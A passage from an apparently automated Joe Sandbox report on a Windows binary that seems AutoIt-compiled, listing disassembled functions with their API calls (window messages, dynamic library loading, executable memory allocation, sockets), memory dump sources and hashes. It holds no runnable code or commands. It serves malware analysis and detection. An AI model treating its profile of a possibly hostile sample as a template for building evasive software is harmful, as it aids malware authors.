                                                      • Opcode Fuzzy Hash: 6e4ac723545c6c3e44b0a9abb3a54cf6415ddedaeddb89bf852d5a8fb07e1e7d
                                                      • Instruction Fuzzy Hash: 67219F32500259ABDF11CFA5CC86FEE3B79EB48714F110254FE156B1D0DAB1AC519BA0
                                                      Function 00AE6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AE6FAA
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AE6FBA
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AE6FDF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 25095a8d79d5aeb206243824f206891f346d88a5e41fd5f544819a492f151c8f
                                                      • Instruction ID: 3735d628522026a3d29afdf8ef23ef818916aa7afbd2beb7a08aab9af0a5d9a1
                                                      • Opcode Fuzzy Hash: 25095a8d79d5aeb206243824f206891f346d88a5e41fd5f544819a492f151c8f
                                                      • Instruction Fuzzy Hash: 8E21A432610158BFDF118F55DC85FAB3BBAEF997A4F018524F9149B1A0CA71AC52CBA0
                                                      Function 00AE797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AE79E1
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AE79F6
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AE7A03
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 20db031e783ab25e1120da45f5e34928b0c24d5d0d46b69c2c49ca2e8db577ca
                                                      • Instruction ID: 03b2dd26156d8d12de4bac29891df0b939b5249bbef5263ef01cbd616bccba98
                                                      • Opcode Fuzzy Hash: 20db031e783ab25e1120da45f5e34928b0c24d5d0d46b69c2c49ca2e8db577ca
                                                      • Instruction Fuzzy Hash: B111E372244288BFEF209F61CC05FEF3BA9EF89764F010529FA41A70A1D6719851DB60
                                                      Function 00A64C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A64C2E), ref: 00A64CA3
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A64CB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: 1f86d81e2ac00e58c0ab3f0e88dd808fae0c147e6759e03dcfea720fe3301025
                                                      • Instruction ID: 9a8c1371165cad1f461dbea933e12ff41105206ea5b97241207b9fd281b0032c
                                                      • Opcode Fuzzy Hash: 1f86d81e2ac00e58c0ab3f0e88dd808fae0c147e6759e03dcfea720fe3301025
                                                      • Instruction Fuzzy Hash: EED01770910767DFDB209F72DA5860676E5EF09791B11CC7E9886DA250E670D880CB50
                                                      Function 00A64D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A64CE1,?), ref: 00A64DA2
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A64DB4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: 6dfa514a145b31a4da8a035bb9f874114a16a0742e6eb06ba9106381ed41fa4f
                                                      • Instruction ID: 1a2b9d8a8f68813322291c2e15c722853468facf5bb29fbacf385be010308f3b
                                                      • Opcode Fuzzy Hash: 6dfa514a145b31a4da8a035bb9f874114a16a0742e6eb06ba9106381ed41fa4f
                                                      • Instruction Fuzzy Hash: B2D017B1950713DFEB209F71D848A8676E4EF09355B11C83ED8C6DA160EB70D880CB50
                                                      Function 00A64D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A64D2E,?,00A64F4F,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64D6F
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A64D81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: 20b1d6586688ce51881d8908cc0a44d2656b1994f07b2ed87845e4de47c6b1d6
                                                      • Instruction ID: 272174a6fd9f7a6aca57758dd6ddb5d3ffc95c592a15dd2460d07f94968d7997
                                                      • Opcode Fuzzy Hash: 20b1d6586688ce51881d8908cc0a44d2656b1994f07b2ed87845e4de47c6b1d6
                                                      • Instruction Fuzzy Hash: 54D01730910753DFDB209F71D84865676E8FF19392B11C93E9486DA2A0EA70D880CB50
                                                      Function 00AE1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00AE12C1), ref: 00AE1080
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AE1092
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: 7c8b79eaebb76060efa175a265017000202c7bc0e4d4df2f375a332522bb8cd5
                                                      • Instruction ID: d52ed98d7a9938898e5ce50413d82151f628b1ad8f6f87e8c802ba60bb502c29
                                                      • Opcode Fuzzy Hash: 7c8b79eaebb76060efa175a265017000202c7bc0e4d4df2f375a332522bb8cd5
                                                      • Instruction Fuzzy Hash: 54D017315107A2CFD7209F76D858A5ABAE4EF49361B118D7EA48ADA160E7B0C8C0CB90
                                                      Function 00AD93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00AD9009,?,00AEF910), ref: 00AD9403
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AD9415
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: d9c1ef7802fc987a8d7a3bae61532bfadb18996246886221c76850e854251164
                                                      • Instruction ID: e7e11af92274bb15c26a22310e2556f365503b8ef9ffd60276df85bac09d1770
                                                      • Opcode Fuzzy Hash: d9c1ef7802fc987a8d7a3bae61532bfadb18996246886221c76850e854251164
                                                      • Instruction Fuzzy Hash: 15D0C770640717CFCB208F71C94820372E4EF01341B00C83EA482EA660E770C880CB50
                                                      Function 00AA1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: a105dfd77b17cd1bd09bf34225a7932d1b73fb2e8394d16364f491e5d00fdffc
                                                      • Instruction ID: 4c0f5106e75051a7cefc4527207ec6a8daa5ddd067918ee2eaed4deab39e74f0
                                                      • Opcode Fuzzy Hash: a105dfd77b17cd1bd09bf34225a7932d1b73fb2e8394d16364f491e5d00fdffc
                                                      • Instruction Fuzzy Hash: 06D012B1804118FACB04EA90DC848F9B77CA705311F5405D2F502D3080F3359B859B31
                                                      Function 00AB76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96419654962d1b602f69c4dda18b9bce238a604a959d2822c07faf93be29010d
                                                      • Instruction ID: 332c0d79815f3d2dc996bcfab77f50b357e18dd5448de7b7ddd0f39d85e4ba59
                                                      • Opcode Fuzzy Hash: 96419654962d1b602f69c4dda18b9bce238a604a959d2822c07faf93be29010d
                                                      • Instruction Fuzzy Hash: 08C16175A04216EFCB14CF98C884EAEB7F9FF88714B158599E805EB252D770DE81CB90
                                                      Function 00ADE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 00ADE3D2
                                                      • CharLowerBuffW.USER32(?,?), ref: 00ADE415
                                                        • Part of subcall function 00ADDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00ADDAD9
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00ADE615
                                                      • _memmove.LIBCMT ref: 00ADE628
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: 35c2d27272d464c2ca4775ecadfef50768ac87d25a445e13e8a1a191a77f5090
                                                      • Instruction ID: 04032e20aab35b38b52ef502e2359c1ce7154c752fd67d79dfbebe86e642079c
                                                      • Opcode Fuzzy Hash: 35c2d27272d464c2ca4775ecadfef50768ac87d25a445e13e8a1a191a77f5090
                                                      • Instruction Fuzzy Hash: 1AC148716083019FC714EF28C48096ABBF4FF89758F14896EF89A9B351D731E946CB82
                                                      Function 00AD83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00AD83D8
                                                      • CoUninitialize.OLE32 ref: 00AD83E3
                                                        • Part of subcall function 00ABDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ABDAC5
                                                      • VariantInit.OLEAUT32(?), ref: 00AD83EE
                                                      • VariantClear.OLEAUT32(?), ref: 00AD86BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: c2708a1d431799b8393c501289afbf7aef50b68754dde32970c838d13ac4f90e
                                                      • Instruction ID: dae1d9cd1b4afe709904eba6b4407d03440204141c33055eb1de115830ce2802
                                                      • Opcode Fuzzy Hash: c2708a1d431799b8393c501289afbf7aef50b68754dde32970c838d13ac4f90e
                                                      • Instruction Fuzzy Hash: 67A128752047019FCB10EF64C995A2AB7F4BF88364F18845DF99A9B3A1CB34ED05CB46
                                                      Function 00AB7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AF2C7C,?), ref: 00AB7C32
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AF2C7C,?), ref: 00AB7C4A
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00AEFB80,000000FF,?,00000000,00000800,00000000,?,00AF2C7C,?), ref: 00AB7C6F
                                                      • _memcmp.LIBCMT ref: 00AB7C90
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 2f5b04f2dd1e12594661587483e3c76028e2f6d10b8172a3099c669b22686988
                                                      • Instruction ID: c38d0c6668f5aea3ad9f857b67a3f40323acd91e2fd767a81164427959a03c16
                                                      • Opcode Fuzzy Hash: 2f5b04f2dd1e12594661587483e3c76028e2f6d10b8172a3099c669b22686988
                                                      • Instruction Fuzzy Hash: 7D81F975A00109EFCB04DF94C984EEEB7B9FF89315F204598F516AB251DB71AE06CB60
                                                      Function 00AB6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: d49e620d1f1ac6def2edc2ed16836823fb20d6aa40ae2b6566494a5a6a47aef3
                                                      • Instruction ID: a2a55634f50e64297588acdcdc294a441ea6ec368e345279affd772eea23436f
                                                      • Opcode Fuzzy Hash: d49e620d1f1ac6def2edc2ed16836823fb20d6aa40ae2b6566494a5a6a47aef3
                                                      • Instruction Fuzzy Hash: 195186306043019EDB24AF75D995ABEB3FDAF48310F20981FF556CB693DA749844AB11
                                                      Function 00AE9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(0159E488,?), ref: 00AE9AD2
                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00AE9B05
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00AE9B72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: d0802592919bb805e13683ae1754bb565cc5fa3287e0d363af74e00eede84de6
                                                      • Instruction ID: bccaea22fe06fef90b9c0c450be75f2c5120a3f2df28d8440c4e3b69375cb3be
                                                      • Opcode Fuzzy Hash: d0802592919bb805e13683ae1754bb565cc5fa3287e0d363af74e00eede84de6
                                                      • Instruction Fuzzy Hash: 66513F34A00289EFCF20DF69D981AAF7BB6FF55360F148169F8159B290D730AD51CB90
                                                      Function 00AD6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00AD6CE4
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6CF4
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AD6D58
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6D64
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      • Opcode ID: 44836d1da6175673d96984677340f7423c1b46dad1c66c977b8d55b97e24a39c
                                                      • Instruction ID: 994a2f5b10b4a84c958c3e12b8d078c0ee1652ff3ad2c5c4edd8aa2517c8a50c
                                                      • Opcode Fuzzy Hash: 44836d1da6175673d96984677340f7423c1b46dad1c66c977b8d55b97e24a39c
                                                      • Instruction Fuzzy Hash: F641AD75740200AFEB20AF24DD86F7A77F9EB08B10F448119FA5A9F3D2DA759C018B91
                                                      Function 00AD672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00AEF910), ref: 00AD67BA
                                                      • _strlen.LIBCMT ref: 00AD67EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      • Opcode ID: 6a3ccefed302ef0a9831ef656bb3d67edbb23cc93c4d865f432e7cd715be43ca
                                                      • Instruction ID: 233a4ac22339e17793aeb6dcdc22e1cc2387c8ffbff5f4d1f6ec170601ff90fd
                                                      • Opcode Fuzzy Hash: 6a3ccefed302ef0a9831ef656bb3d67edbb23cc93c4d865f432e7cd715be43ca
                                                      • Instruction Fuzzy Hash: 9C418335A00104AFCB14EBA4DDD5EAEB7BDEF48750F14816AF8169B392DB30AD05D750
                                                      Function 00ACBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                      Download Yara Rule
                                                      APIs
